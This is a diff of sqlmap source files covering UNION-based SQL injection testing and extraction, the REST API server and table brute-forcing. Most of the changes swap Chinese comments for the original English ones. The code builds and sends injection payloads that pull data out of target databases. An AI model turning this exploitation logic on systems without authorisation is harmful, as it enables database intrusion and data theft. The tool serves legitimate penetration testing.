        if not all((validPayload, vector)) and not all((conf.uChar, conf.dbms, kb.unionTemplate)):
            if Backend.getIdentifiedDbms() and kb.orderByColumns and kb.orderByColumns < FUZZ_UNION_MAX_COLUMNS:
                if kb.fuzzUnionTest is None:
@ -436,7 +341,6 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
            warnMsg = "if UNION based SQL injection is not detected, "
            warnMsg += "please consider "

-            # 如果NULL值注入不可用,提示尝试使用随机整数
            if not conf.uChar and count > 1 and kb.uChar == NULL and conf.uValues is None:
                message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] "

@ -447,7 +351,6 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
                    conf.uChar = kb.uChar = str(randomInt(2))
                    validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)

-            # 提示强制指定数据库类型
            if not conf.dbms:
                if not conf.uChar:
                    warnMsg += "and/or try to force the "
@ -458,8 +361,7 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
            if not all((validPayload, vector)) and not warnMsg.endswith("consider "):
                singleTimeWarnMessage(warnMsg)

-        # 如果ORDER BY结果无效,丢弃并重试
-        if orderBy is None and kb.orderByColumns is not None and not all((validPayload, vector)):
+        if orderBy is None and kb.orderByColumns is not None and not all((validPayload, vector)):  # discard ORDER BY results (not usable - e.g. maybe invalid altogether)
            conf.uChar, kb.uChar = uChars
            validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)

@ -468,22 +370,10 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
@stackedmethod
 def unionTest(comment, place, parameter, value, prefix, suffix):
    """
-    测试目标URL是否存在UNION SQL注入漏洞
-    最多测试3*50次
-    
-    参数:
-    comment - SQL注释
-    place - 注入点位置
-    parameter - 注入参数
-    value - 参数值
-    prefix - SQL前缀
-    suffix - SQL后缀
-    
-    返回:
-    (有效载荷, 注入向量)元组
+    This method tests if the target URL is affected by an union
+    SQL injection vulnerability. The test is done up to 3*50 times
    """

-    # 直连模式下不进行测试
    if conf.direct:
        return

@ -491,7 +381,6 @@ def unionTest(comment, place, parameter, value, prefix, suffix):
    setTechnique(PAYLOAD.TECHNIQUE.UNION)

    try:
-        # 如果使用否定逻辑,保存当前状态
        if negativeLogic:
            pushValue(kb.negativeLogic)
            pushValue(conf.string)
@ -500,16 +389,13 @@ def unionTest(comment, place, parameter, value, prefix, suffix):
            kb.negativeLogic = False
            conf.string = conf.code = None

-        # 进行UNION注入测试
        validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
    finally:
-        # 恢复否定逻辑状态
        if negativeLogic:
            conf.code = popValue()
            conf.string = popValue()
            kb.negativeLogic = popValue()

-    # 移除载荷分隔符
    if validPayload:
        validPayload = agent.removePayloadDelimiters(validPayload)

--- a/src/sqlmap-master/lib/techniques/union/use.py
+++ b/src/sqlmap-master/lib/techniques/union/use.py
@ -5,12 +5,10 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的模块
 import json
 import re
 import time

-# 导入sqlmap自定义模块
 from lib.core.agent import agent
 from lib.core.bigarray import BigArray
 from lib.core.common import arrayizeValue
@ -65,67 +63,48 @@ from thirdparty import six
 from thirdparty.odict import OrderedDict

 def _oneShotUnionUse(expression, unpack=True, limited=False):
-    """
-    执行一次UNION查询
-    
-    参数:
-    expression - SQL查询表达式
-    unpack - 是否需要解包结果
-    limited - 是否限制查询结果数量
-    
-    返回:
-    查询结果
-    """
-    # 从hashDB中检索缓存的结果
-    retVal = hashDBRetrieve("%s%s" % (conf.hexConvert or False, expression), checkConf=True)
+    retVal = hashDBRetrieve("%s%s" % (conf.hexConvert or False, expression), checkConf=True)  # as UNION data is stored raw unconverted

-    # 获取当前线程数据
    threadData = getCurrentThreadData()
    threadData.resumed = retVal is not None

    if retVal is None:
-        # 获取UNION注入向量
        vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector

        if not kb.jsonAggMode:
-            # 构造注入表达式
            injExpression = unescaper.escape(agent.concatQuery(expression, unpack))
            kb.unionDuplicates = vector[7]
            kb.forcePartialUnion = vector[8]

-            # 设置表名和UNION模板
+            # Note: introduced columns in 1.4.2.42#dev
            try:
                kb.tableFrom = vector[9]
                kb.unionTemplate = vector[10]
            except IndexError:
                pass

-            # 构造UNION查询
            query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
            where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6]
        else:
-            # JSON聚合模式
            injExpression = unescaper.escape(expression)
            where = vector[6]
            query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False)

-        # 构造payload并发送请求
        payload = agent.payload(newValue=query, where=where)
+
+        # Perform the request
        page, headers, _ = Request.queryPage(payload, content=True, raise404=False)

-        # 检查结果是否被强制转换为大写
        if page and kb.chars.start.upper() in page and kb.chars.start not in page:
-            singleTimeWarnMessage("结果似乎被强制转换为大写。sqlmap将自动将其转换为小写")
+            singleTimeWarnMessage("results seems to be upper-cased by force. sqlmap will automatically lower-case them")
+
            page = page.lower()

-        # 增加UNION技术使用计数
        incrementCounter(PAYLOAD.TECHNIQUE.UNION)

-        # JSON聚合模式下的结果处理
        if kb.jsonAggMode:
            for _page in (page or "", (page or "").replace('\\"', '"')):
                if Backend.isDbms(DBMS.MSSQL):
-                    # MSSQL特定的JSON结果解析
                    output = extractRegexResult(r"%s(?P<result>.*)%s" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload))
                    if output:
                        try:
@ -138,12 +117,10 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
                        else:
                            retVal = getUnicode(retVal)
                elif Backend.isDbms(DBMS.PGSQL):
-                    # PostgreSQL特定的结果解析
                    output = extractRegexResult(r"(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload))
                    if output:
                        retVal = output
                else:
-                    # 其他数据库的JSON结果解析
                    output = extractRegexResult(r"%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop), removeReflectiveValues(_page, payload))
                    if output:
                        try:
@ -158,74 +135,61 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
                if retVal:
                    break
        else:
-            # 非JSON模式下的结果解析
+            # Parse the returned page to get the exact UNION-based
+            # SQL injection output
            def _(regex):
                return firstNotNone(
                    extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE),
                    extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE)
                )

-            # 自动修复最后一个字符被截断的情况
+            # Automatically patching last char trimming cases
            if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""):
-                warnMsg = "自动修复输出中最后一个字符被截断的情况"
+                warnMsg = "automatically patching output having last char trimmed"
                singleTimeWarnMessage(warnMsg)
                page = page.replace(kb.chars.stop[:-1], kb.chars.stop)

            retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop))

-        # 处理结果
        if retVal is not None:
            retVal = getUnicode(retVal, kb.pageEncoding)

-            # MSSQL错误信息特殊处理
+            # Special case when DBMS is Microsoft SQL Server and error message is used as a result of UNION injection
            if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError():
                retVal = htmlUnescape(retVal).replace("<br>", "\n")

-            # 将结果写入hashDB缓存
            hashDBWrite("%s%s" % (conf.hexConvert or False, expression), retVal)

        elif not kb.jsonAggMode:
-            # 检查是否存在输出被截断的情况
            trimmed = _("%s(?P<result>.*?)<" % (kb.chars.start))

            if trimmed:
-                warnMsg = "检测到可能的服务器截断输出 "
-                warnMsg += "(可能由于长度或内容导致): "
+                warnMsg = "possible server trimmed output detected "
+                warnMsg += "(probably due to its length and/or content): "
                warnMsg += safecharencode(trimmed)
                logger.warning(warnMsg)

-            # 尝试移除ORDER BY子句重试
            elif re.search(r"ORDER BY [^ ]+\Z", expression):
-                debugMsg = "重试失败的SQL查询(不带ORDER BY子句)"
+                debugMsg = "retrying failed SQL query without the ORDER BY clause"
                singleTimeDebugMessage(debugMsg)

                expression = re.sub(r"\s*ORDER BY [^ ]+\Z", "", expression)
                retVal = _oneShotUnionUse(expression, unpack, limited)

-            # 尝试关闭NATIONAL CHARACTER转换
            elif kb.nchar and re.search(r" AS N(CHAR|VARCHAR)", agent.nullAndCastField(expression)):
-                debugMsg = "关闭NATIONAL CHARACTER转换"
+                debugMsg = "turning off NATIONAL CHARACTER casting"  # NOTE: in some cases there are "known" incompatibilities between original columns and NCHAR (e.g. http://testphp.vulnweb.com/artists.php?artist=1)
                singleTimeDebugMessage(debugMsg)

                kb.nchar = False
                retVal = _oneShotUnionUse(expression, unpack, limited)
    else:
-        # 从缓存获取结果时设置unionDuplicates
        vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector
        kb.unionDuplicates = vector[7]

    return retVal

 def configUnion(char=None, columns=None):
-    """
-    配置UNION注入的参数
-    
-    参数:
-    char - UNION分隔符
-    columns - UNION查询的列数范围
-    """
    def _configUnionChar(char):
-        """配置UNION分隔符"""
        if not isinstance(char, six.string_types):
            return

@ -235,7 +199,6 @@ def configUnion(char=None, columns=None):
            kb.uChar = char.replace("[CHAR]", conf.uChar if isDigit(conf.uChar) else "'%s'" % conf.uChar.strip("'"))

    def _configUnionCols(columns):
-        """配置UNION查询的列数范围"""
        if not isinstance(columns, six.string_types):
            return

@ -246,12 +209,13 @@ def configUnion(char=None, columns=None):
            colsStart, colsStop = columns, columns

        if not isDigit(colsStart) or not isDigit(colsStop):
-            raise SqlmapSyntaxException("--union-cols必须是整数范围")
+            raise SqlmapSyntaxException("--union-cols must be a range of integers")

        conf.uColsStart, conf.uColsStop = int(colsStart), int(colsStop)

        if conf.uColsStart > conf.uColsStop:
-            errMsg = "--union-cols范围必须是从小到大的数字"
+            errMsg = "--union-cols range has to represent lower to "
+            errMsg += "higher number of columns"
            raise SqlmapSyntaxException(errMsg)

    _configUnionChar(char)
@ -259,21 +223,13 @@ def configUnion(char=None, columns=None):

 def unionUse(expression, unpack=True, dump=False):
    """
-    使用UNION SQL注入技术执行查询
-    
-    参数:
-    expression - SQL查询表达式
-    unpack - 是否需要解包结果
-    dump - 是否在dump模式下执行
-    
-    返回:
-    查询结果
+    This function tests for an UNION SQL injection on the target
+    URL then call its subsidiary function to effectively perform an
+    UNION SQL injection on the affected URL
    """

-    # 初始化UNION注入技术
    initTechnique(PAYLOAD.TECHNIQUE.UNION)

-    # 初始化变量
    abortedFlag = False
    count = None
    origExpr = expression
@ -281,35 +237,32 @@ def unionUse(expression, unpack=True, dump=False):
    stopLimit = None
    value = None

-    # 获取控制台宽度和开始时间
    width = getConsoleWidth()
    start = time.time()

-    # 解析表达式中的字段
    _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr)

-    # 设置部分运行标志(API模式)
+    # Set kb.partRun in case the engine is called from the API
    kb.partRun = getPartRun(alias=False) if conf.api else None

-    # 移除ORDER BY子句(如果存在)
    if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper():
+        # Removed ORDER BY clause because UNION does not play well with it
        expression = re.sub(r"(?i)\s*ORDER BY\s+[\w,]+", "", expression)
-        debugMsg = "由于ORDER BY子句与UNION查询不兼容,已将其移除"
+        debugMsg = "stripping ORDER BY clause from statement because "
+        debugMsg += "it does not play well with UNION query SQL injection"
        singleTimeDebugMessage(debugMsg)

-    # 检查是否可以使用JSON聚合模式
    if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ORACLE, DBMS.PGSQL, DBMS.MSSQL, DBMS.SQLITE) and expressionFields and not any((conf.binaryFields, conf.limitStart, conf.limitStop, conf.forcePartial, conf.disableJson)):
        match = re.search(r"SELECT\s*(.+?)\bFROM", expression, re.I)
        if match and not (Backend.isDbms(DBMS.ORACLE) and FROM_DUMMY_TABLE[DBMS.ORACLE] in expression) and not re.search(r"\b(MIN|MAX|COUNT)\(", expression):
            kb.jsonAggMode = True
-            # 根据不同数据库构造JSON聚合查询
            if Backend.isDbms(DBMS.MYSQL):
                query = expression.replace(expressionFields, "CONCAT('%s',JSON_ARRAYAGG(CONCAT_WS('%s',%s)),'%s')" % (kb.chars.start, kb.chars.delimiter, expressionFields, kb.chars.stop), 1)
            elif Backend.isDbms(DBMS.ORACLE):
                query = expression.replace(expressionFields, "'%s'||JSON_ARRAYAGG(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join(expressionFieldsList), kb.chars.stop), 1)
            elif Backend.isDbms(DBMS.SQLITE):
                query = expression.replace(expressionFields, "'%s'||JSON_GROUP_ARRAY(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1)
-            elif Backend.isDbms(DBMS.PGSQL):
+            elif Backend.isDbms(DBMS.PGSQL):    # Note: ARRAY_AGG does CSV alike output, thus enclosing start/end inside each item
                query = expression.replace(expressionFields, "ARRAY_AGG('%s'||%s||'%s')::text" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s::text,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1)
            elif Backend.isDbms(DBMS.MSSQL):
                query = "'%s'+(%s FOR JSON AUTO, INCLUDE_NULL_VALUES)+'%s'" % (kb.chars.start, expression, kb.chars.stop)
@ -317,13 +270,16 @@ def unionUse(expression, unpack=True, dump=False):
            value = parseUnionPage(output)
            kb.jsonAggMode = False

-    # 检查是否需要分页查询
+    # We have to check if the SQL query might return multiple entries
+    # if the technique is partial UNION query and in such case forge the
+    # SQL limiting the query output one entry at a time
+    # NOTE: we assume that only queries that get data from a table can
+    # return multiple entries
    if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or conf.forcePartial or (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
-        # 添加LIMIT条件
        expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump)

        if limitCond:
-            # 计算查询结果总数
+            # Count the number of SQL query entries output
            countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1)

            if " ORDER BY " in countedExpression.upper():
@ -339,33 +295,36 @@ def unionUse(expression, unpack=True, dump=False):
                else:
                    stopLimit = int(count)

-                    debugMsg = "SQL查询返回 "
-                    debugMsg += "%d %s" % (stopLimit, "条结果" if stopLimit > 1 else "条结果")
+                    debugMsg = "used SQL query returns "
+                    debugMsg += "%d %s" % (stopLimit, "entries" if stopLimit > 1 else "entry")
                    logger.debug(debugMsg)

            elif count and (not isinstance(count, six.string_types) or not count.isdigit()):
-                warnMsg = "无法计算SQL查询的结果数量。"
-                warnMsg += "sqlmap将假设只返回一条结果"
+                warnMsg = "it was not possible to count the number "
+                warnMsg += "of entries for the SQL query provided. "
+                warnMsg += "sqlmap will assume that it returns only "
+                warnMsg += "one entry"
                logger.warning(warnMsg)

                stopLimit = 1

            elif not isNumPosStrValue(count):
                if not count:
-                    warnMsg = "SQL查询没有返回任何结果"
+                    warnMsg = "the SQL query provided does not "
+                    warnMsg += "return any output"
                    logger.warning(warnMsg)
                else:
-                    value = []  # 空表
+                    value = []  # for empty tables
                return value

-            # 如果结果数大于1,使用多线程处理
            if isNumPosStrValue(count) and int(count) > 1:
                threadData = getCurrentThreadData()

                try:
                    threadData.shared.limits = iter(xrange(startLimit, stopLimit))
                except OverflowError:
-                    errMsg = "边界限制 (%d,%d) 太大。请使用'--fresh-queries'重新运行" % (startLimit, stopLimit)
+                    errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
+                    errMsg += "with switch '--fresh-queries'"
                    raise SqlmapDataException(errMsg)

                numThreads = min(conf.threads, (stopLimit - startLimit))
@ -380,15 +339,12 @@ def unionUse(expression, unpack=True, dump=False):

                if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
                    kb.suppressResumeInfo = True
-                    debugMsg = "由于行数较多,抑制可能的恢复控制台信息"
+                    debugMsg = "suppressing possible resume console info for "
+                    debugMsg += "large number of rows as it might take too long"
                    logger.debug(debugMsg)

                try:
                    def unionThread():
-                        """
-                        UNION查询的线程函数
-                        处理分页查询的单个线程任务
-                        """
                        threadData = getCurrentThreadData()

                        while kb.threadContinue:
@ -399,7 +355,6 @@ def unionUse(expression, unpack=True, dump=False):
                                except StopIteration:
                                    break

-                            # 根据数据库类型处理字段
                            if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
                                field = expressionFieldsList[0]
                            elif Backend.isDbms(DBMS.ORACLE):
@ -407,7 +362,6 @@ def unionUse(expression, unpack=True, dump=False):
                            else:
                                field = None

-                            # 构造限制查询
                            limitedExpr = agent.limitQuery(num, expression, field)
                            output = _oneShotUnionUse(limitedExpr, unpack, True)

@ -422,7 +376,7 @@ def unionUse(expression, unpack=True, dump=False):
                                        if threadData.shared.showEta:
                                            threadData.shared.progress.progress(threadData.shared.counter)
                                        if isListLike(items):
-                                            # 处理返回列数不匹配的情况
+                                            # in case that we requested N columns and we get M!=N then we have to filter a bit
                                            if len(items) > 1 and len(expressionFieldsList) > 1:
                                                items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)]
                                            items = [_ for _ in flattenValue(items)]
@ -450,14 +404,12 @@ def unionUse(expression, unpack=True, dump=False):

                                        items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter)

-                                    # 处理缓冲区
                                    while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH):
                                        threadData.shared.lastFlushed, _ = threadData.shared.buffered[0]
                                        if not isNoneValue(_):
                                            threadData.shared.value.extend(arrayizeValue(_))
                                        del threadData.shared.buffered[0]

-                                # 显示查询进度
                                if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta and not kb.bruteMode:
                                    _ = ','.join("'%s'" % _ for _ in (flattenValue(arrayizeValue(items)) if not isinstance(items, six.string_types) else [items]))
                                    status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_))
@ -467,7 +419,6 @@ def unionUse(expression, unpack=True, dump=False):

                                    dataToStdout("%s\n" % status)

-                    # 运行多线程查询
                    runThreads(numThreads, unionThread)

                    if conf.verbose == 1:
@ -476,28 +427,25 @@ def unionUse(expression, unpack=True, dump=False):
                except KeyboardInterrupt:
                    abortedFlag = True

-                    warnMsg = "用户中止枚举。sqlmap "
-                    warnMsg += "将显示部分输出"
+                    warnMsg = "user aborted during enumeration. sqlmap "
+                    warnMsg += "will display partial output"
                    logger.warning(warnMsg)

                finally:
-                    # 整理最终结果
                    for _ in sorted(threadData.shared.buffered):
                        if not isNoneValue(_[1]):
                            threadData.shared.value.extend(arrayizeValue(_[1]))
                    value = threadData.shared.value
                    kb.suppressResumeInfo = False

-    # 如果没有使用分页查询且未中止,执行单次查询
    if not value and not abortedFlag:
        output = _oneShotUnionUse(expression, unpack)
        value = parseUnionPage(output)

-    # 计算查询耗时
    duration = calculateDeltaSeconds(start)

    if not kb.bruteMode:
-        debugMsg = "执行了 %d 次查询,耗时 %.2f 秒" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration)
+        debugMsg = "performed %d quer%s in %.2f seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], 'y' if kb.counters[PAYLOAD.TECHNIQUE.UNION] == 1 else "ies", duration)
        logger.debug(debugMsg)

    return value
--- a/src/sqlmap-master/lib/utils/api.py
+++ b/src/sqlmap-master/lib/utils/api.py
@ -128,7 +128,6 @@ class Database(object):

 class Task(object):
    def __init__(self, taskid, remote_addr):
-        # 初始化任务对象，设置远程地址、进程、输出目录、选项等属性
        self.remote_addr = remote_addr
        self.process = None
        self.output_directory = None
@ -137,7 +136,6 @@ class Task(object):
        self.initialize_options(taskid)

    def initialize_options(self, taskid):
-        # 初始化选项，设置默认值
        datatype = {"boolean": False, "string": None, "integer": None, "float": None}
        self.options = AttribDict()

@ -160,23 +158,18 @@ class Task(object):
        self._original_options = AttribDict(self.options)

    def set_option(self, option, value):
-        # 设置选项
        self.options[option] = value

    def get_option(self, option):
-        # 获取选项
        return self.options[option]

    def get_options(self):
-        # 获取所有选项
        return self.options

    def reset_options(self):
-        # 重置选项为初始值
        self.options = AttribDict(self._original_options)

    def engine_start(self):
-        # 启动sqlmap引擎
        handle, configFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CONFIG, text=True)
        os.close(handle)
        saveConfig(self.options, configFile)
@ -191,7 +184,6 @@ class Task(object):
            self.process = Popen(["sqlmap", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN)

    def engine_stop(self):
-        # 停止sqlmap引擎
        if self.process:
            self.process.terminate()
            return self.process.wait()
@ -199,11 +191,9 @@ class Task(object):
            return None

    def engine_process(self):
-        # 获取sqlmap引擎进程
        return self.process

    def engine_kill(self):
-        # 杀死sqlmap引擎进程
        if self.process:
            try:
                self.process.kill()
@ -213,14 +203,12 @@ class Task(object):
        return None

    def engine_get_id(self):
-        # 获取sqlmap引擎进程ID
        if self.process:
            return self.process.pid
        else:
            return None

    def engine_get_returncode(self):
-        # 获取sqlmap引擎进程返回码
        if self.process:
            self.process.poll()
            return self.process.returncode
@ -228,7 +216,6 @@ class Task(object):
            return None

    def engine_has_terminated(self):
-        # 判断sqlmap引擎进程是否已经终止
        return isinstance(self.engine_get_returncode(), int)

 # Wrapper functions for sqlmap engine
@ -292,14 +279,11 @@ class LogRecorder(logging.StreamHandler):
        conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", (conf.taskid, time.strftime("%X"), record.levelname, str(record.msg % record.args if record.args else record.msg)))

 def setRestAPILog():
-    # 如果配置文件中api字段为真
    if conf.api:
        try:
-            # 连接数据库
            conf.databaseCursor = Database(conf.database)
            conf.databaseCursor.connect("client")
        except sqlite3.OperationalError as ex:
-            # 如果连接数据库失败，抛出异常
            raise SqlmapConnectionException("%s ('%s')" % (ex, conf.database))

        # Set a logging handler that writes log messages to a IPC database
@ -313,33 +297,24 @@ def is_admin(token):

@hook('before_request')
 def check_authentication():
-    # 检查是否已经认证
    if not any((DataStore.username, DataStore.password)):
        return

-    # 获取请求头中的Authorization字段
    authorization = request.headers.get("Authorization", "")
-    # 使用正则表达式匹配Authorization字段中的Basic认证信息
    match = re.search(r"(?i)\ABasic\s+([^\s]+)", authorization)

-    # 如果没有匹配到Basic认证信息，则将请求路径设置为错误页面
    if not match:
        request.environ["PATH_INFO"] = "/error/401"

    try:
-        # 解码Basic认证信息
        creds = decodeBase64(match.group(1), binary=False)
    except:
-        # 如果解码失败，则将请求路径设置为错误页面
        request.environ["PATH_INFO"] = "/error/401"
    else:
-        # 如果解码后的认证信息中冒号的数量不等于1，则将请求路径设置为错误页面
        if creds.count(':') != 1:
            request.environ["PATH_INFO"] = "/error/401"
        else:
-            # 将认证信息分割为用户名和密码
            username, password = creds.split(':')
-            # 如果用户名或密码不匹配，则将请求路径设置为错误页面
            if username.strip() != (DataStore.username or "") or password.strip() != (DataStore.password or ""):
                request.environ["PATH_INFO"] = "/error/401"

@ -505,28 +480,18 @@ def option_set(taskid):
    Set value of option(s) for a certain task ID
    """

-    # Check if the task ID exists in the DataStore
    if taskid not in DataStore.tasks:
-        # Log a warning if the task ID does not exist
        logger.warning("[%s] Invalid task ID provided to option_set()" % taskid)
-        # Return a JSON response indicating failure
        return jsonize({"success": False, "message": "Invalid task ID"})

-    # Check if the request JSON is None
    if request.json is None:
-        # Log a warning if the request JSON is None
        logger.warning("[%s] Invalid JSON options provided to option_set()" % taskid)
-        # Return a JSON response indicating failure
        return jsonize({"success": False, "message": "Invalid JSON options"})

-    # Iterate through the request JSON
    for option, value in request.json.items():
-        # Set the option for the task ID in the DataStore
        DataStore.tasks[taskid].set_option(option, value)

-    # Log a debug message indicating the options have been set
    logger.debug("(%s) Requested to set options" % taskid)
-    # Return a JSON response indicating success
    return jsonize({"success": True})

 # Handle scans
@ -565,18 +530,13 @@ def scan_stop(taskid):
    Stop a scan
    """

-    # 检查任务ID是否有效
    if (taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()):
-        # 如果任务ID无效，记录警告日志并返回错误信息
        logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid)
        return jsonize({"success": False, "message": "Invalid task ID"})

-    # 停止任务
    DataStore.tasks[taskid].engine_stop()

-    # 记录调试日志
    logger.debug("(%s) Stopped scan" % taskid)
-    # 返回成功信息
    return jsonize({"success": True})

@get("/scan/<taskid>/kill")
@ -649,17 +609,14 @@ def scan_log_limited(taskid, start, end):

    json_log_messages = list()

-    # Check if the taskid exists in the DataStore
    if taskid not in DataStore.tasks:
        logger.warning("[%s] Invalid task ID provided to scan_log_limited()" % taskid)
        return jsonize({"success": False, "message": "Invalid task ID"})

-    # Check if the start and end values are digits and if the end value is greater than the start value
    if not start.isdigit() or not end.isdigit() or int(end) < int(start):
        logger.warning("[%s] Invalid start or end value provided to scan_log_limited()" % taskid)
        return jsonize({"success": False, "message": "Invalid start or end value, must be digits"})

-    # Set the start and end values to a minimum of 1
    start = max(1, int(start))
    end = max(1, int(end))

@ -678,7 +635,6 @@ def scan_log(taskid):

    json_log_messages = list()

-    # Check if the taskid exists in the DataStore
    if taskid not in DataStore.tasks:
        logger.warning("[%s] Invalid task ID provided to scan_log()" % taskid)
        return jsonize({"success": False, "message": "Invalid task ID"})
@ -729,27 +685,21 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST
    REST-JSON API server
    """

-    # 生成一个随机的16字节的admin_token
    DataStore.admin_token = encodeHex(os.urandom(16), binary=False)
-    # 设置用户名和密码
    DataStore.username = username
    DataStore.password = password

-    # 如果没有指定数据库，则创建一个临时数据库
    if not database:
        _, Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False)
        os.close(_)
    else:
-        # 否则使用指定的数据库
        Database.filepath = database

-    # 如果端口为0，则随机生成一个端口
    if port == 0:  # random
        with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
            s.bind((host, 0))
            port = s.getsockname()[1]

-    # 打印运行信息
    logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port))
    logger.info("Admin (secret) token: %s" % DataStore.admin_token)
    logger.debug("IPC database: '%s'" % Database.filepath)
@ -787,35 +737,25 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST
        logger.critical(errMsg)

 def _client(url, options=None):
-    # 打印正在调用的url
    logger.debug("Calling '%s'" % url)
    try:
-        # 设置请求头
        headers = {"Content-Type": "application/json"}

-        # 如果options不为空，则将options转换为json格式
        if options is not None:
            data = getBytes(jsonize(options))
        else:
            data = None

-        # 如果DataStore中有用户名或密码，则将用户名和密码进行base64编码，并添加到请求头中
        if DataStore.username or DataStore.password:
            headers["Authorization"] = "Basic %s" % encodeBase64("%s:%s" % (DataStore.username or "", DataStore.password or ""), binary=False)

-        # 创建请求对象
        req = _urllib.request.Request(url, data, headers)
-        # 发送请求并获取响应
        response = _urllib.request.urlopen(req)
-        # 将响应内容转换为文本
        text = getText(response.read())
    except:
-        # 如果options不为空，则打印错误信息
        if options:
            logger.error("Failed to load and parse %s" % url)
-        # 抛出异常
        raise
-    # 返回文本
    return text

 def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=None, password=None):
--- a/src/sqlmap-master/lib/utils/brute.py
+++ b/src/sqlmap-master/lib/utils/brute.py
@ -62,77 +62,60 @@ def _addPageTextWords():

@stackedmethod
 def tableExists(tableFile, regex=None):
-    # 检查是否需要使用表存在性检查
    if kb.choices.tableExists is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct:
-        # 如果使用PAYLOAD.TECHNIQUE.TIME和PAYLOAD.TECHNIQUE.STACKED进行表存在性检查，则发出警告
        warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED])
        warnMsg += "for common table existence check"
        logger.warning(warnMsg)

-        # 提示用户是否继续
        message = "are you sure you want to continue? [y/N] "
        kb.choices.tableExists = readInput(message, default='N', boolean=True)

-        # 如果用户选择不继续，则返回None
        if not kb.choices.tableExists:
            return None

-    # 检查表存在性
    result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr())))

-    # 如果检查结果无效，则抛出异常
    if result:
